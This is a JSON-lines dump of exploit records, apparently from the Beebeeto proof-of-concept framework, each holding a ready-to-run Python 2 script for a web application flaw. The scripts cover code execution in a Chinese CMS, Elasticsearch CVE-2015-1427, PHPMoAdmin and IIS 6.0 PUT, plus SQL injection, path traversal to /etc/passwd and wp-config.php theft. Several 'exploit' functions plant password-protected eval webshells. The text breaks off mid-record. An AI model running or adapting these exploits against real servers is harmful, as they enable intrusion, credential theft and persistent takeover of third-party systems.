+{"create_date": "2015-03-08 09:54:54", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/data/log/passlog.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0054',\r\n            'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n            'author': '1024',\r\n            'create_date': '2015-03-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n            'vul_version': ['*'],\r\n            'type': 'Command Execution',\r\n            'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/data/log/passlog.php', 'php'],\r\n            'desc': '\u5382\u5546\uff1ahttp://www.90576.com/  \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-085633',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        # del passlog\r\n        del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n        requests.get(del_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request DEL_URL: ' + del_url\r\n        # submit code\r\n        login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n        login_data = {'loginuser': '<?php echo(md5(0));phpinfo();?>','loginpass':'0'}\r\n        if args['options']['verbose']:\r\n            print '[*] Submit code: ' + login_url\r\n            print '[*] Code content: ' + login_data['loginuser']\r\n        requests.post(login_url, data=login_data)\r\n        # return page\r\n        verify_url = '%s/data/log/passlog.php' % url\r\n        content = requests.get(verify_url).content\r\n        if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        # del passlog\r\n        del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n        requests.get(del_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request DEL_URL: ' + del_url\r\n        # submit code\r\n        login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n        login_data = {'loginuser': '<?php echo(md5(0));eval($_POST[bb2]);?>','loginpass':'0'}\r\n        if args['options']['verbose']:\r\n            print '[*] Submit code: ' + login_url\r\n            print '[*] Code content: ' + login_data['loginuser']\r\n        requests.post(login_url, data=login_data)\r\n        # return page\r\n        webshell = '%s/data/log/passlog.php' % url\r\n        content = requests.get(webshell).content\r\n        if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = webshell\r\n            args['poc_ret']['password'] = 'bb2'\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/  \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0054", "layer4_protocol": null}
+{"create_date": "2015-03-07 23:20:06", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0053',\r\n            'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n            'author': '1024',\r\n            'create_date': '2015-03-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n            'vul_version': ['*'],\r\n            'type': 'Command Execution',\r\n            'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/index.php', 'php'],\r\n            'desc': '\u5382\u5546\uff1ahttp://www.90576.com/  \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-083077',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/index.php?col=13&mod=web&q=%24{%40phpinfo()}'\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(verify_url).read()\r\n        if '<title>phpinfo()</title>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        payload = '/index.php?col=13&mod=web&q=%24{%40eval($_POST[bb2])}%24{%40print(md5(123))}'\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(verify_url).read()\r\n        if '202cb962ac59075b964b07152d234b70' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = verify_url\r\n            args['poc_ret']['password'] = 'bb2'\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/  \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0053", "layer4_protocol": null}
+{"create_date": "2015-03-06 11:03:08", "name": "\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax/coupon.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0051',\r\n            'name': '\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'xiangshou',\r\n            'create_date': '2015-03-06',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax/coupon.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': [\r\n                'http://wooyun.org/bugs/wooyun-2014-075525',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/\"\r\n                   \"**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,\"\r\n                   \"password,0x3a,email,md5(233)),8,9,10,11,9999999999,13,14,15,16/**/from/\"\r\n                   \"**/user/**/where/**/manager=0x59/**/limit/**/0,1%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if 'e165421110ba03099a1c0393373c5b43' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2015-0051", "layer4_protocol": null}
+{"create_date": "2015-03-05 12:59:13", "name": "ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,Elasticsearch,JAVA,CVE-2015-1427", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0048',\r\n            'name': 'ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC',\r\n            'author': '\u96f7\u950b',\r\n            'create_date': '2015-03-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [9200],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Elasticsearch',\r\n            'vul_version': ['*'],\r\n            'type': 'Code Execution',\r\n            'tag': ['Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'Elasticsearch', 'JAVA', 'CVE-2015-1427'],\r\n            'desc': '''\r\n                    ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n                    \u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n                    \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n                    \u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\r\n                    ''',\r\n            'references': [\r\n                   'http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0',\r\n                   'http://zone.wooyun.org/content/18915',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/_search?pretty'\r\n        cs = {\r\n                'size':'1',\r\n                'script_fields':\r\n                {'iswin':\r\n                    {'script':\r\n                        'java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\").\\\r\n                        getConstructor(java.io.Reader.class).newInstance(java.lang.\\\r\n                        Math.class.forName(\\\"java.io.InputStreamReader\\\").getConstructor\\\r\n                        (java.io.InputStream.class).newInstance(java.lang.Math.class.forName\\\r\n                        (\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()))\\\r\n                        .readLines()','lang':'groovy'\r\n                    }\r\n                }\r\n             }\r\n        jdata = json.dumps(cs)\r\n        req = urllib2.urlopen(verify_url, jdata)\r\n        content = req.read()\r\n        if 'root:' in content and 'nobody:' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n\u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n\u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002", "app_name": "ElasticSearch", "id": "poc-2015-0048", "layer4_protocol": null}
+{"create_date": "2015-03-04 17:42:58", "name": "WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Django\u6f0f\u6d1e,Tornado\u6f0f\u6d1e,Web.py\u6f0f\u6d1e,python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0047',\r\n            'name': 'WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-03-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Other',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Read',\r\n            'tag': ['Django\u6f0f\u6d1e', 'Tornado\u6f0f\u6d1e', 'Web.py\u6f0f\u6d1e', 'python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e'],\r\n            'desc': 'N/A',\r\n            'references': [\r\n                'http://www.lijiejie.com/python-django-directory-traversal/',\r\n                'http://drops.wooyun.org/papers/5040',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/../../../../../../../../../etc/passwd'\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: %s' % verify_url\r\n        content = requests.get(verify_url).content\r\n        if 'root:' in content and 'nobody:' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0047", "layer4_protocol": null}
+{"create_date": "2015-03-04 10:39:02", "name": "PHPMoAdmin /moadmin.php \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "PHPMoAdmin\u6f0f\u6d1e,PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c,/moadmin.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0044',\r\n            'name': 'PHPMoAdmin /moadmin.php \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-03-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPMoAdmin',\r\n            'vul_version': ['*'],\r\n            'type': 'Command Execution',\r\n            'tag': ['PHPMoAdmin\u6f0f\u6d1e', 'PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c', '/moadmin.php', 'php'],\r\n            'desc': 'PHPMoAdmin is a MongoDB administration tool for PHP built on a\\\r\n                     stripped-down version of the Vork high-performance framework.',\r\n            'references': ['http://seclists.org/fulldisclosure/2015/Mar/19',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_path = ['/moadmin.php', '/moadmin/moadmin.php', '/wu-moadmin/wu-moadmin.php']\r\n        for f in file_path:\r\n            verify_url = args['options']['target'] + f\r\n            command = {'object': '''1;system('echo -n \"beebeeto\"|md5sum;');exit''',}\r\n            if args['options']['verbose']:\r\n                print '[*] Request URL: ' + verify_url\r\n            content = requests.post(verify_url, data=command).content\r\n            if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                args['poc_ret']['post_content'] = \"object=1;system('command');exit\"\r\n                return args\r\n            continue\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "PHPMoAdmin is a MongoDB administration tool for PHP built on a\r\nstripped-down version of the Vork high-performance framework.", "app_name": "PHPMoAdmin", "id": "poc-2015-0044", "layer4_protocol": null}
+{"create_date": "2015-03-03 10:51:31", "name": "IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u521b\u5efa", "tag": "IIS PUT \u6f0f\u6d1e,IIS,IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20,IIS\u8001\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\nimport httplib\r\nimport sys\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0043',\r\n            'name': 'IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit',\r\n            'author': '1024',\r\n            'create_date': '2015-03-03',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'IIS',\r\n            'vul_version': ['6.0'],\r\n            'type': 'Arbitrary File Creation',\r\n            'tag': ['IIS PUT \u6f0f\u6d1e', 'IIS', 'IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20', 'IIS\u8001\u6f0f\u6d1e'],\r\n            'desc': \"IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002\",\r\n            'references': ['http://www.lijiejie.com/python-iis-put-file/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        if verify_url.startswith(('http://', 'https://')):\r\n            verify_url = urlparse.urlparse(verify_url).netloc\r\n        if args['options']['verbose']:\r\n            print '[*] Detection server type...'\r\n        conn = httplib.HTTPConnection(verify_url)\r\n        conn.request(method='OPTIONS', url='/')\r\n        headers = dict(conn.getresponse().getheaders())\r\n        if args['options']['verbose']:\r\n            if headers.get('server', '').find('Microsoft-IIS') < 0:\r\n                print '[-] This is not an IIS web server'\r\n        if 'public' in headers and \\\r\n            headers['public'].find('PUT') > 0 and \\\r\n            headers['public'].find('MOVE') > 0:\r\n            conn.close()\r\n            conn = httplib.HTTPConnection(verify_url)\r\n            # PUT hack.txt\r\n            conn.request( method='PUT', url='/hack.txt', body='<%execute(request(\"bb2\"))%>' )\r\n            conn.close()\r\n            conn = httplib.HTTPConnection(verify_url)\r\n            # mv hack.txt to hack.asp\r\n            conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['webshell'] = '%s/hack.txt' % verify_url\r\n            args['poc_ret']['password'] = 'bb2'\r\n            return args\r\n        args['poc_ret']['false'] = '[-] Server not vulnerable'\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0043", "layer4_protocol": null}
+{"create_date": "2015-03-02 15:12:41", "name": "Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e,/direct_download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {  \r\n          # poc\u76f8\u5173\u4fe1\u606f  \r\n          'poc': {  \r\n              'id': 'poc-2015-0041',\r\n              'name': 'Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n              'author': 'Tiny',\r\n              'create_date': '2015-03-01',\r\n          },  \r\n          # \u534f\u8bae\u76f8\u5173\u4fe1\u606f  \r\n          'protocol': {  \r\n              'name': 'http',\r\n              'port': [80],\r\n              'layer4_protocol': ['tcp'],\r\n          },  \r\n          # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f  \r\n          'vul': {  \r\n              'app_name': 'Wordpress',\r\n              'vul_version': ['<=1.0.11',], \r\n              'type': 'Arbitrary File Download',\r\n              'tag': ['Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e', '/direct_download.php','php'],\r\n              'desc': '''\r\n                      Wordpress CodeArt Google MP3 Player Plugin has file download in\r\n                      do/direct_download.php.\r\n                      ''',\r\n              'references': ['http://www.exploit-db.com/exploits/35460/', \r\n              ],  \r\n          },  \r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = 'file=../../../wp-config.php'\r\n        path = '/wp-content/plugins/google-mp3-audio-player/direct_download.php?'\r\n        verify_url = args['options']['target'] + path + payload\r\n        request = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        response = urllib2.urlopen(request)\r\n        reg = re.compile(\"DB_PASSWORD\")\r\n        if reg.findall(response.read()):\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n    \r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Wordpress CodeArt Google MP3 